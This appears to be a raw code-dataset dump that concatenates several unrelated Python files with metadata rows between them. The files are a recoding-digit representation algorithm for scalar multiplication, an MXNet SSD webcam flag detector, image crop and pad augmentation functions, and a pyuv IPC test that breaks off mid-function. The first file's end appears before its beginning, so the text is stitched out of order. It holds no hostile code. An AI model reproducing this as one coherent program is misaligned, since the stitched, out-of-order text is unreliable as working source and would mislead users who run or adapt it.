def check_num(rdr):
b = 1
sum = 0
for i in range(len(rdr)-1, -1, -1):
sum = sum + b*rdr[i]
b = b*2
return sum
def run_tests_time():
i = 10
j = 0
averageTime = 0
nist = [651056770906015076056810763456358567190100156695615665659,
2695995667150639794667015087019625940457807714424391721682712368051,
115792089210351248362697456949407573528996955234135760342422159061068512044339,
26959956671506397946670150870196259404578077144243917216827126959956671506397946670150870196259404578077144243917216,
2695995667150639794667015087019625940457807714424391721682712368058238947189273490172349807129834790127349087129834623486127461012630462184628923461201280461]
w = [5, 7, 9 , 11]
index_w = 0
index_nist = 0
while index_w < 1:
while index_nist < 5:
D = generate_random_D(2**w[index_w], 2**(w[index_w]-3)-1)
while j < 1000:
# print j
startTime = time.time()
rdr = RDR_algorithm(D, nist[index_nist])
endTime = time.time()
averageTime = averageTime + (endTime - startTime)
j = j+1
averageTime = averageTime / 1000
print "Average Time for NIST[", index_nist, "] and w = ", w[index_w], " = ", averageTime
averageTime = 0
j = 0
index_nist = index_nist +1
index_nist = 0
index_w = index_w + 1
if __name__ == '__main__':
# print "bin > ", bin(651056770906015076056810763456358567190100156695615665659)
# # run_tests_time()
# nist = [651056770906015076056810763456358567190100156695615665659,
# 2695995667150639794667015087019625940457807714424391721682712368051,
# 115792089210351248362697456949407573528996955234135760342422159061068512044339,
# 26959956671506397946670150870196259404578077144243917216827126959956671506397946670150870196259404578077144243917216,
# 2695995667150639794667015087019625940457807714424391721682712368058238947189273490172349807129834790127349087129834623486127461012630462184628923461201280461]
# D = [1, 7, 23, 25, 33, 37, 39, 43, 49, 53, 63, 65, 67, 71, 75, 77, 85, 89, 97, 99, 103, 107, 113, 115, 117, 119, 127, 131, 133, 135, 145, 151, 153, 157, 163, 165, 171, 181, 183, 185, 189, 191, 197, 199, 201, 203, 207, 211, 213, 219, 221, 225, 227, 229, 233, 235, 237, 243, 247, 255, 257, 259, 269, 283, 287, 295, 307, 311, 321, 329, 333, 335, 339, 341, 345, 349, 351, 371, 373, 381, 385, 393, 403, 405, 411, 419,421, 429, 431, 433, 435, 437, 441, 459, 471, 489, 503, 519, 521, 523, 527, 529, 535, 537, 543, 547, 549, 563, 567, 577, 585, 589, 601, 603, 609, 615, 619, 627, 633, 635, 641, 643, 655, 659, 665, 671, 675, 681, 687, 709, 711, 719, 727, 729, 731, 733, 735, 737, 741, 743, 745, 747, 749, 751, 755, 761, 763, 765, 771, 777, 779, 783, 785, 789, 797, 803, 807, 813, 817, 827, 839, 841, 845, 853, 859, 863, 865, 871, 873, 875, 883, 887, 889, 891, 895, 897, 899, 901, 905, 909, 915, 925, 927, 933, 935, 945, 949, 961, 963, 967, 977, 983, 985, 987, 989, 995]
# k = nist[4]
# rdr = RDR_algorithm(D, k)
# print "IFRA > ", rdr
rdr = RDR_algorithm([1, 3, 23, 27], 314154655)
print "RDR > ", rdr
print "Min_len > ", len(rdr)
print "IsRDR > ", check_rdr(rdr)
print "check > ", check_num(rdr)
| 42.679612
| 968
| 0.535942
|
import math
import random
import time
def average_density(rdr):
countZeros = 0
length = 0
for i in rdr:
length = length + 1
if (i == 0):
countZeros = countZeros + 1
return [length - countZeros, length]
def check_rdr(rdr):
for i in range (0, len(rdr)-1):
if rdr[i] != 0 and rdr[i+1] != 0:
return False
return True
def generate_random_D(m, l):
if l > (m+1)/2:
raise ValueError("l should satisfy the condition l <= (m+1)/2")
D = []
for i in range(2, l+1, 1):
odd = False
while not odd:
x = random.randint(3, m)
if(x % 2 != 0 and x not in D):
odd = True
D.append(x)
D.sort()
D.insert(0, 1)
return D
def add_carry_revised(bin_k):
len_k = len(bin_k)
bin_s = list(bin_k)
carry = '0'
if (bin_k == ''):
return '1'
if(bin_k[len_k-1] == '0'):
bin_s[len_k-1] = '1'
else:
bin_s[len_k-1] = '0'
carry = '1'
# index is set to the second LSB
index = len_k-2
while carry == '1':
# if k was only 1 bit, we just append the carry
if index == -1:
carry = '0'
bin_s.insert(0, '1')
# if we reached the MSB and it's 1, then we make it 0 and append 1,
elif index == 0:
carry = '0'
if (bin_s[index] == '1'):
bin_s[index] = '0'
bin_s.insert(0, '1')
else:
bin_s[index] = '1'
# or it is set to 0, and carry is still 1
elif(bin_k[index] == '0'):
bin_s[index] = '1'
carry = '0'
else:
bin_s[index] = '0'
# Update the index
index = index - 1
# bin_s is converted back to a variable
bin_k = "".join(bin_s)
return bin_k
def get_Wn(D):
return int(math.floor(math.log(max(D), 2)))
def RDR_algorithm(D, k):
rdr = []
bin_k = bin(k)[2:]
# get number of bits
Wn = get_Wn(D)
flag_d = 0
while bin_k != '':
# If k is even, zero is appened to rdr and k is shifted right 1 bit
if bin_k[len(bin_k)-1] == '0':
rdr.insert(0, 0)
bin_k = bin_k[:len(bin_k)-1]
continue
# if LSB is not 0, we extract w bit
for w in range(Wn + 1, 0, -1):
# if the window is bigger than the length of k, we need to have smaller windwo
if (w > len(bin_k)):
continue
# we check every d in the digit set D
for d in D:
bin_d = bin(d)[2:] # get the binary representation of d
length_bin_d = len(bin_d)
# extract w bits from bin_k
k_reg = bin_k[len(bin_k) - w:]
# compute the negative residue of d, if neg_d is negative, it is ignored by setting it to 0.
neg_d = 2**w - d
while neg_d < 0:
neg_d = 0
neg_bin_d = bin(neg_d)[2:] # get the binary representation of neg_d
length_neg_bin_d = len(neg_bin_d)
# d cannot be chosen unless the value is less than the extracted window.
if d <= k_reg:
if int(bin_d, 2) ^ int(k_reg, 2) == 0:
rdr.insert(0, d)
# inserting w-1 zeros
for j in range(0, w-1):
rdr.insert(0, 0)
# update k by shifting it right w bits
bin_k = bin_k[:len(bin_k) - w]
# set flag_d to 1 to set the window to Wn+1
flag_d = 1
break
elif int(neg_bin_d, 2) ^ int(k_reg, 2) == 0 and neg_d != 1:
rdr.insert(0, -d)
# Inserting zeros
for j in range(0, w-1):
rdr.insert(0, 0)
# update k by shifting it right w bits
bin_k = bin_k[:len(bin_k) - w]
# update k after adding a carry to LSB
bin_k = add_carry_revised(bin_k)
# set flag_d to 1 to set the window to Wn+1
flag_d = 1
break
# break out of the for loop to check if we finished k or not
if flag_d == 1:
flag_d = 0
break
# In the end, there might be some leading zeros which are not needed,
# this while loop removes the leading zeros and update k accordingly
while (rdr[0] == 0):
rdr = rdr[1:]
# return the result, and length of result
return rdr
# this function return the value of rdr representation.
def check_num(rdr):
b = 1
sum = 0
for i in range(len(rdr)-1, -1, -1):
sum = sum + b*rdr[i]
b = b*2
return sum
def run_tests_time():
i = 10
j = 0
averageTime = 0
nist = [651056770906015076056810763456358567190100156695615665659,
2695995667150639794667015087019625940457807714424391721682712368051,
115792089210351248362697456949407573528996955234135760342422159061068512044339,
26959956671506397946670150870196259404578077144243917216827126959956671506397946670150870196259404578077144243917216,
2695995667150639794667015087019625940457807714424391721682712368058238947189273490172349807129834790127349087129834623486127461012630462184628923461201280461]
w = [5, 7, 9 , 11]
index_w = 0
index_nist = 0
while index_w < 1:
while index_nist < 5:
D = generate_random_D(2**w[index_w], 2**(w[index_w]-3)-1)
while j < 1000:
# print j
startTime = time.time()
rdr = RDR_algorithm(D, nist[index_nist])
endTime = time.time()
averageTime = averageTime + (endTime - startTime)
j = j+1
averageTime = averageTime / 1000
print "Average Time for NIST[", index_nist, "] and w = ", w[index_w], " = ", averageTime
averageTime = 0
j = 0
index_nist = index_nist +1
index_nist = 0
index_w = index_w + 1
if __name__ == '__main__':
# print "bin > ", bin(651056770906015076056810763456358567190100156695615665659)
# # run_tests_time()
# nist = [651056770906015076056810763456358567190100156695615665659,
# 2695995667150639794667015087019625940457807714424391721682712368051,
# 115792089210351248362697456949407573528996955234135760342422159061068512044339,
# 26959956671506397946670150870196259404578077144243917216827126959956671506397946670150870196259404578077144243917216,
# 2695995667150639794667015087019625940457807714424391721682712368058238947189273490172349807129834790127349087129834623486127461012630462184628923461201280461]
# D = [1, 7, 23, 25, 33, 37, 39, 43, 49, 53, 63, 65, 67, 71, 75, 77, 85, 89, 97, 99, 103, 107, 113, 115, 117, 119, 127, 131, 133, 135, 145, 151, 153, 157, 163, 165, 171, 181, 183, 185, 189, 191, 197, 199, 201, 203, 207, 211, 213, 219, 221, 225, 227, 229, 233, 235, 237, 243, 247, 255, 257, 259, 269, 283, 287, 295, 307, 311, 321, 329, 333, 335, 339, 341, 345, 349, 351, 371, 373, 381, 385, 393, 403, 405, 411, 419,421, 429, 431, 433, 435, 437, 441, 459, 471, 489, 503, 519, 521, 523, 527, 529, 535, 537, 543, 547, 549, 563, 567, 577, 585, 589, 601, 603, 609, 615, 619, 627, 633, 635, 641, 643, 655, 659, 665, 671, 675, 681, 687, 709, 711, 719, 727, 729, 731, 733, 735, 737, 741, 743, 745, 747, 749, 751, 755, 761, 763, 765, 771, 777, 779, 783, 785, 789, 797, 803, 807, 813, 817, 827, 839, 841, 845, 853, 859, 863, 865, 871, 873, 875, 883, 887, 889, 891, 895, 897, 899, 901, 905, 909, 915, 925, 927, 933, 935, 945, 949, 961, 963, 967, 977, 983, 985, 987, 989, 995]
# k = nist[4]
# rdr = RDR_algorithm(D, k)
# print "IFRA > ", rdr
rdr = RDR_algorithm([1, 3, 23, 27], 314154655)
print "RDR > ", rdr
print "Min_len > ", len(rdr)
print "IsRDR > ", check_rdr(rdr)
print "check > ", check_num(rdr)
| false
| true
|
790b01b1c205b5dea6dd4f8d22dcd97188b5f521
| 4,031
|
py
|
Python
|
object_detection_app.py
|
Prasad9/Detect-Flags-SSD
|
c0d662bde99ed8df33d72bd06d61d5eb869d31a5
|
[
"MIT"
] | 13
|
2017-11-08T07:09:13.000Z
|
2022-03-28T07:09:47.000Z
|
object_detection_app.py
|
Prasad9/Detect-Flags-SSD
|
c0d662bde99ed8df33d72bd06d61d5eb869d31a5
|
[
"MIT"
] | 3
|
2018-03-08T04:30:19.000Z
|
2019-01-03T15:47:24.000Z
|
object_detection_app.py
|
Prasad9/Detect-Flags-SSD
|
c0d662bde99ed8df33d72bd06d61d5eb869d31a5
|
[
"MIT"
] | 5
|
2018-01-15T15:26:44.000Z
|
2021-08-18T08:02:51.000Z
|
import os
import cv2
import time
import argparse
import multiprocessing
import numpy as np
import tools.find_mxnet
import mxnet as mx
import sys
from detect.image_detector import ImageDetector
from symbol.symbol_factory import get_symbol
from utils import WebcamVideoStream
class_names = 'Argentina, Australia, Bhutan, Brazil, Canada, China, Cuba, France, Germany, Greece, India, \
Kenya, Mexico, Norway, Portugal, Saudi Arabia, South Africa, Sri Lanka, Sweden, Thailand, \
Turkey, Ukraine, U.A.E., U.K., U.S.A.'
detector = None
def get_detector(net, prefix, epoch, data_shape, mean_pixels, ctx, class_names, thresh, plot_confidence,
nms_thresh=0.5, force_nms=True, nms_topk=400):
if net is not None:
net = get_symbol(net, data_shape, num_classes=len(class_names), nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
detector = ImageDetector(net, prefix, epoch, data_shape, mean_pixels, class_names, thresh,\
plot_confidence, ctx=ctx)
return detector
def process_image(image_frame):
# run detection
detected_img = detector.detect_and_layover_image(image_frame, False)
return detected_img
def parse_args():
parser = argparse.ArgumentParser(description='Detect objects in the live video')
parser.add_argument('--network', dest='network', type=str, default='vgg16_reduced',
help='which network to use')
parser.add_argument('--epoch', dest='epoch', help='epoch of pretrained model',
default=1, type=int)
parser.add_argument('--prefix', dest='prefix', help='Trained model prefix',
default=os.path.join(os.getcwd(), 'model', 'ssd'), type=str)
parser.add_argument('--thresh', dest='thresh', help='Threshold of confidence level',
default=0.43, type=float)
parser.add_argument('--plot-prob', dest='plot_prob', help='Should probabilities be printed. (1 = Yes, 0 = No)',
default=1, type=int)
parser.add_argument('--nms', dest='nms_thresh', type=float, default=0.45,
help='non-maximum suppression threshold')
parser.add_argument('--mean-r', dest='mean_r', type=float, default=123,
help='red mean value')
parser.add_argument('--mean-g', dest='mean_g', type=float, default=117,
help='green mean value')
parser.add_argument('--mean-b', dest='mean_b', type=float, default=104,
help='blue mean value')
parser.add_argument('--data-shape', dest='data_shape', type=int, default=300,
help='set image shape')
parser.add_argument('--class-names', dest='class_names', type=str,
default = class_names, help='string of comma separated names')
parser.add_argument('--force', dest='force_nms', type=bool, default=True,
help='force non-maximum suppression on different class')
parser.add_argument('--has-gpu', dest='gpu', help='GPU device 1 if present else 0',
default=1, type=int)
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=480, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=640, help='Height of the frames in the video stream.')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
color_subtract = (args.mean_r, args.mean_g, args.mean_b)
ctx = mx.gpu(0) if args.gpu == 1 else mx.cpu(0)
class_names = [class_name.strip() for class_name in args.class_names.split(',')]
detector = get_detector(args.network, args.prefix, args.epoch, args.data_shape, color_subtract, ctx,
class_names, args.thresh, args.plot_prob, args.nms_thresh, args.force_nms)
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
while True:
frame = video_capture.read()
detected_img = process_image(frame)
cv2.imshow('Video', detected_img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.stop()
cv2.destroyAllWindows()
| 41.556701
| 112
| 0.711734
|
import os
import cv2
import time
import argparse
import multiprocessing
import numpy as np
import tools.find_mxnet
import mxnet as mx
import sys
from detect.image_detector import ImageDetector
from symbol.symbol_factory import get_symbol
from utils import WebcamVideoStream
class_names = 'Argentina, Australia, Bhutan, Brazil, Canada, China, Cuba, France, Germany, Greece, India, \
Kenya, Mexico, Norway, Portugal, Saudi Arabia, South Africa, Sri Lanka, Sweden, Thailand, \
Turkey, Ukraine, U.A.E., U.K., U.S.A.'
detector = None
def get_detector(net, prefix, epoch, data_shape, mean_pixels, ctx, class_names, thresh, plot_confidence,
nms_thresh=0.5, force_nms=True, nms_topk=400):
if net is not None:
net = get_symbol(net, data_shape, num_classes=len(class_names), nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
detector = ImageDetector(net, prefix, epoch, data_shape, mean_pixels, class_names, thresh,\
plot_confidence, ctx=ctx)
return detector
def process_image(image_frame):
detected_img = detector.detect_and_layover_image(image_frame, False)
return detected_img
def parse_args():
parser = argparse.ArgumentParser(description='Detect objects in the live video')
parser.add_argument('--network', dest='network', type=str, default='vgg16_reduced',
help='which network to use')
parser.add_argument('--epoch', dest='epoch', help='epoch of pretrained model',
default=1, type=int)
parser.add_argument('--prefix', dest='prefix', help='Trained model prefix',
default=os.path.join(os.getcwd(), 'model', 'ssd'), type=str)
parser.add_argument('--thresh', dest='thresh', help='Threshold of confidence level',
default=0.43, type=float)
parser.add_argument('--plot-prob', dest='plot_prob', help='Should probabilities be printed. (1 = Yes, 0 = No)',
default=1, type=int)
parser.add_argument('--nms', dest='nms_thresh', type=float, default=0.45,
help='non-maximum suppression threshold')
parser.add_argument('--mean-r', dest='mean_r', type=float, default=123,
help='red mean value')
parser.add_argument('--mean-g', dest='mean_g', type=float, default=117,
help='green mean value')
parser.add_argument('--mean-b', dest='mean_b', type=float, default=104,
help='blue mean value')
parser.add_argument('--data-shape', dest='data_shape', type=int, default=300,
help='set image shape')
parser.add_argument('--class-names', dest='class_names', type=str,
default = class_names, help='string of comma separated names')
parser.add_argument('--force', dest='force_nms', type=bool, default=True,
help='force non-maximum suppression on different class')
parser.add_argument('--has-gpu', dest='gpu', help='GPU device 1 if present else 0',
default=1, type=int)
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=480, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=640, help='Height of the frames in the video stream.')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
color_subtract = (args.mean_r, args.mean_g, args.mean_b)
ctx = mx.gpu(0) if args.gpu == 1 else mx.cpu(0)
class_names = [class_name.strip() for class_name in args.class_names.split(',')]
detector = get_detector(args.network, args.prefix, args.epoch, args.data_shape, color_subtract, ctx,
class_names, args.thresh, args.plot_prob, args.nms_thresh, args.force_nms)
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
while True:
frame = video_capture.read()
detected_img = process_image(frame)
cv2.imshow('Video', detected_img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.stop()
cv2.destroyAllWindows()
| true
| true
|
790b01d343e3c9f073136f2bbba4dff70bc167a1
| 7,604
|
py
|
Python
|
data/crop_and_pad_augmentations.py
|
rexxxx1234/SAUNet-demo
|
20e968e1d42217c89cdf4fc304ed2d8717697eec
|
[
"BSD-3-Clause"
] | 81
|
2020-01-22T20:26:36.000Z
|
2022-03-03T09:34:17.000Z
|
data/crop_and_pad_augmentations.py
|
saunetcvpr2020/shape-attentive-unet
|
c309fd705fd7b572c80813ab688cc594ed026ad7
|
[
"BSD-3-Clause"
] | 10
|
2020-04-22T15:47:11.000Z
|
2021-09-05T02:24:41.000Z
|
data/crop_and_pad_augmentations.py
|
rexxxx1234/SAUNet-demo
|
20e968e1d42217c89cdf4fc304ed2d8717697eec
|
[
"BSD-3-Clause"
] | 18
|
2020-01-23T07:24:35.000Z
|
2021-09-17T08:46:09.000Z
|
# Copyright 2017 Division of Medical Image Computing, German Cancer Research Center (DKFZ)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import range
import numpy as np
from batchgenerators.augmentations.utils import pad_nd_image
def center_crop(data, crop_size, seg=None):
return crop(data, seg, crop_size, 0, 'center')
def get_lbs_for_random_crop(crop_size, data_shape, margins):
"""
:param crop_size:
:param data_shape: (b,c,x,y(,z)) must be the whole thing!
:param margins:
:return:
"""
lbs = []
for i in range(len(data_shape) - 2):
if data_shape[i+2] - crop_size[i] - margins[i] > margins[i]:
lbs.append(np.random.randint(margins[i], data_shape[i+2] - crop_size[i] - margins[i]))
else:
lbs.append((data_shape[i+2] - crop_size[i]) // 2)
return lbs
def get_lbs_for_center_crop(crop_size, data_shape):
"""
:param crop_size:
:param data_shape: (b,c,x,y(,z)) must be the whole thing!
:return:
"""
lbs = []
for i in range(len(data_shape) - 2):
lbs.append((data_shape[i + 2] - crop_size[i]) // 2)
return lbs
def crop(data, seg=None, crop_size=128, margins=(0, 0, 0), crop_type="center",
pad_mode='constant', pad_kwargs={'constant_values': 0},
pad_mode_seg='constant', pad_kwargs_seg={'constant_values': 0}):
"""
crops data and seg (seg may be None) to crop_size. Whether this will be achieved via center or random crop is
determined by crop_type. Margin will be respected only for random_crop and will prevent the crops form being closer
than margin to the respective image border. crop_size can be larger than data_shape - margin -> data/seg will be
padded with zeros in that case. margins can be negative -> results in padding of data/seg followed by cropping with
margin=0 for the appropriate axes
:param data: b, c, x, y(, z)
:param seg:
:param crop_size:
:param margins: distance from each border, can be int or list/tuple of ints (one element for each dimension).
Can be negative (data/seg will be padded if needed)
:param crop_type: random or center
:return:
"""
if not isinstance(data, (list, tuple, np.ndarray)):
raise TypeError("data has to be either a numpy array or a list")
data_shape = tuple([len(data)] + list(data[0].shape))
data_dtype = data[0].dtype
dim = len(data_shape) - 2
if seg is not None:
seg_shape = tuple([len(seg)] + list(seg[0].shape))
seg_dtype = seg[0].dtype
if not isinstance(seg, (list, tuple, np.ndarray)):
raise TypeError("data has to be either a numpy array or a list")
assert all([i == j for i, j in zip(seg_shape[2:], data_shape[2:])]), "data and seg must have the same spatial " \
"dimensions. Data: %s, seg: %s" % \
(str(data_shape), str(seg_shape))
if type(crop_size) not in (tuple, list, np.ndarray):
crop_size = [crop_size] * dim
else:
assert len(crop_size) == len(
data_shape) - 2, "If you provide a list/tuple as center crop make sure it has the same dimension as your " \
"data (2d/3d)"
if not isinstance(margins, (np.ndarray, tuple, list)):
margins = [margins] * dim
data_return = np.zeros([data_shape[0], data_shape[1]] + list(crop_size), dtype=data_dtype)
if seg is not None:
seg_return = np.zeros([seg_shape[0], seg_shape[1]] + list(crop_size), dtype=seg_dtype)
else:
seg_return = None
for b in range(data_shape[0]):
data_shape_here = [data_shape[0]] + list(data[b].shape)
if seg is not None:
seg_shape_here = [seg_shape[0]] + list(seg[b].shape)
if crop_type == "center":
lbs = get_lbs_for_center_crop(crop_size, data_shape_here)
elif crop_type == "random":
lbs = get_lbs_for_random_crop(crop_size, data_shape_here, margins)
else:
raise NotImplementedError("crop_type must be either center or random")
need_to_pad = [[0, 0]] + [[abs(min(0, lbs[d])),
abs(min(0, data_shape_here[d + 2] - (lbs[d] + crop_size[d])))]
for d in range(dim)]
# we should crop first, then pad -> reduces i/o for memmaps, reduces RAM usage and improves speed
ubs = [min(lbs[d] + crop_size[d], data_shape_here[d+2]) for d in range(dim)]
lbs = [max(0, lbs[d]) for d in range(dim)]
slicer_data = [slice(0, data_shape_here[1])] + [slice(lbs[d], ubs[d]) for d in range(dim)]
data_cropped = data[b][tuple(slicer_data)]
if seg_return is not None:
slicer_seg = [slice(0, seg_shape_here[1])] + [slice(lbs[d], ubs[d]) for d in range(dim)]
seg_cropped = seg[b][tuple(slicer_seg)]
if any([i > 0 for j in need_to_pad for i in j]):
data_return[b] = np.pad(data_cropped, need_to_pad, pad_mode, **pad_kwargs)
if seg_return is not None:
seg_return[b] = np.pad(seg_cropped, need_to_pad, pad_mode_seg, **pad_kwargs_seg)
else:
data_return[b] = data_cropped
if seg_return is not None:
seg_return[b] = seg_cropped
return data_return, seg_return
def random_crop(data, seg=None, crop_size=128, margins=[0, 0, 0]):
return crop(data, seg, crop_size, margins, 'random')
def pad_nd_image_and_seg(data, seg, new_shape=None, must_be_divisible_by=None, pad_mode_data='constant',
np_pad_kwargs_data=None, pad_mode_seg='constant', np_pad_kwargs_seg=None):
"""
Pads data and seg to new_shape. new_shape is thereby understood as min_shape (if data/seg is already larger then
new_shape the shape stays the same for the dimensions this applies)
:param data:
:param seg:
:param new_shape: if none then only must_be_divisible_by is applied
:param must_be_divisible_by: UNet like architectures sometimes require the input to be divisibly by some number. This
will modify new_shape if new_shape is not divisibly by this (by increasing it accordingly).
must_be_divisible_by should be a list of int (one for each spatial dimension) and this list must have the same
length as new_shape
:param pad_mode_data: see np.pad
:param np_pad_kwargs_data:see np.pad
:param pad_mode_seg:see np.pad
:param np_pad_kwargs_seg:see np.pad
:return:
"""
sample_data = pad_nd_image(data, new_shape, mode=pad_mode_data, kwargs=np_pad_kwargs_data,
return_slicer=False, shape_must_be_divisible_by=must_be_divisible_by)
if seg is not None:
sample_seg = pad_nd_image(seg, new_shape, mode=pad_mode_seg, kwargs=np_pad_kwargs_seg,
return_slicer=False, shape_must_be_divisible_by=must_be_divisible_by)
else:
sample_seg = None
return sample_data, sample_seg
| 44.209302
| 121
| 0.642951
|
from builtins import range
import numpy as np
from batchgenerators.augmentations.utils import pad_nd_image
def center_crop(data, crop_size, seg=None):
return crop(data, seg, crop_size, 0, 'center')
def get_lbs_for_random_crop(crop_size, data_shape, margins):
lbs = []
for i in range(len(data_shape) - 2):
if data_shape[i+2] - crop_size[i] - margins[i] > margins[i]:
lbs.append(np.random.randint(margins[i], data_shape[i+2] - crop_size[i] - margins[i]))
else:
lbs.append((data_shape[i+2] - crop_size[i]) // 2)
return lbs
def get_lbs_for_center_crop(crop_size, data_shape):
lbs = []
for i in range(len(data_shape) - 2):
lbs.append((data_shape[i + 2] - crop_size[i]) // 2)
return lbs
def crop(data, seg=None, crop_size=128, margins=(0, 0, 0), crop_type="center",
pad_mode='constant', pad_kwargs={'constant_values': 0},
pad_mode_seg='constant', pad_kwargs_seg={'constant_values': 0}):
if not isinstance(data, (list, tuple, np.ndarray)):
raise TypeError("data has to be either a numpy array or a list")
data_shape = tuple([len(data)] + list(data[0].shape))
data_dtype = data[0].dtype
dim = len(data_shape) - 2
if seg is not None:
seg_shape = tuple([len(seg)] + list(seg[0].shape))
seg_dtype = seg[0].dtype
if not isinstance(seg, (list, tuple, np.ndarray)):
raise TypeError("data has to be either a numpy array or a list")
assert all([i == j for i, j in zip(seg_shape[2:], data_shape[2:])]), "data and seg must have the same spatial " \
"dimensions. Data: %s, seg: %s" % \
(str(data_shape), str(seg_shape))
if type(crop_size) not in (tuple, list, np.ndarray):
crop_size = [crop_size] * dim
else:
assert len(crop_size) == len(
data_shape) - 2, "If you provide a list/tuple as center crop make sure it has the same dimension as your " \
"data (2d/3d)"
if not isinstance(margins, (np.ndarray, tuple, list)):
margins = [margins] * dim
data_return = np.zeros([data_shape[0], data_shape[1]] + list(crop_size), dtype=data_dtype)
if seg is not None:
seg_return = np.zeros([seg_shape[0], seg_shape[1]] + list(crop_size), dtype=seg_dtype)
else:
seg_return = None
for b in range(data_shape[0]):
data_shape_here = [data_shape[0]] + list(data[b].shape)
if seg is not None:
seg_shape_here = [seg_shape[0]] + list(seg[b].shape)
if crop_type == "center":
lbs = get_lbs_for_center_crop(crop_size, data_shape_here)
elif crop_type == "random":
lbs = get_lbs_for_random_crop(crop_size, data_shape_here, margins)
else:
raise NotImplementedError("crop_type must be either center or random")
need_to_pad = [[0, 0]] + [[abs(min(0, lbs[d])),
abs(min(0, data_shape_here[d + 2] - (lbs[d] + crop_size[d])))]
for d in range(dim)]
ubs = [min(lbs[d] + crop_size[d], data_shape_here[d+2]) for d in range(dim)]
lbs = [max(0, lbs[d]) for d in range(dim)]
slicer_data = [slice(0, data_shape_here[1])] + [slice(lbs[d], ubs[d]) for d in range(dim)]
data_cropped = data[b][tuple(slicer_data)]
if seg_return is not None:
slicer_seg = [slice(0, seg_shape_here[1])] + [slice(lbs[d], ubs[d]) for d in range(dim)]
seg_cropped = seg[b][tuple(slicer_seg)]
if any([i > 0 for j in need_to_pad for i in j]):
data_return[b] = np.pad(data_cropped, need_to_pad, pad_mode, **pad_kwargs)
if seg_return is not None:
seg_return[b] = np.pad(seg_cropped, need_to_pad, pad_mode_seg, **pad_kwargs_seg)
else:
data_return[b] = data_cropped
if seg_return is not None:
seg_return[b] = seg_cropped
return data_return, seg_return
def random_crop(data, seg=None, crop_size=128, margins=[0, 0, 0]):
return crop(data, seg, crop_size, margins, 'random')
def pad_nd_image_and_seg(data, seg, new_shape=None, must_be_divisible_by=None, pad_mode_data='constant',
np_pad_kwargs_data=None, pad_mode_seg='constant', np_pad_kwargs_seg=None):
sample_data = pad_nd_image(data, new_shape, mode=pad_mode_data, kwargs=np_pad_kwargs_data,
return_slicer=False, shape_must_be_divisible_by=must_be_divisible_by)
if seg is not None:
sample_seg = pad_nd_image(seg, new_shape, mode=pad_mode_seg, kwargs=np_pad_kwargs_seg,
return_slicer=False, shape_must_be_divisible_by=must_be_divisible_by)
else:
sample_seg = None
return sample_data, sample_seg
| true
| true
|
790b02247d23dd0853cbf0a6b0028ba2c23b6b70
| 4,497
|
py
|
Python
|
tests/test_ipc.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | 1
|
2020-01-21T11:10:38.000Z
|
2020-01-21T11:10:38.000Z
|
tests/test_ipc.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | null | null | null |
tests/test_ipc.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | null | null | null |
import sys
from common import unittest2, platform_skip
import pyuv
TEST_PORT = 1234
if sys.platform == 'win32':
TEST_PIPE = '\\\\.\\pipe\\test-pipe'
else:
TEST_PIPE = 'test-pipe'
@platform_skip(["win32"])
class IPCTest(unittest2.TestCase):
def setUp(self):
self.loop = pyuv.Loop.default_loop()
def proc_exit_cb(self, proc, exit_status, term_signal):
proc.close()
def on_client_connection(self, client, error):
client.close()
self.connections.remove(client)
def make_many_connections(self):
for i in range(100):
conn = pyuv.TCP(self.loop)
self.connections.append(conn)
conn.connect(("127.0.0.1", TEST_PORT), self.on_client_connection)
def on_ipc_connection(self, handle, error):
if self.local_conn_accepted:
return
conn = pyuv.TCP(self.loop)
self.tcp_server.accept(conn)
conn.close()
self.tcp_server.close()
self.local_conn_accepted = True
def on_channel_read(self, handle, data, pending, error):
if self.tcp_server is None:
self.assertEqual(pending, pyuv.UV_TCP)
self.tcp_server = pyuv.TCP(self.loop)
self.channel.accept(self.tcp_server)
self.tcp_server.listen(self.on_ipc_connection, 12)
self.assertEqual(data.strip(), b"hello")
self.channel.write(b"world")
self.make_many_connections()
else:
if data.strip() == b"accepted_connection":
self.assertEqual(pending, pyuv.UV_UNKNOWN_HANDLE)
self.channel.close()
def test_ipc1(self):
self.connections = []
self.local_conn_accepted = False
self.tcp_server = None
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc.py", "listen_before_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable , args=["proc_ipc.py", "listen_before_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
def test_ipc2(self):
self.connections = []
self.local_conn_accepted = False
self.tcp_server = None
self.channel = pyuv.Pipe(self.loop, True)
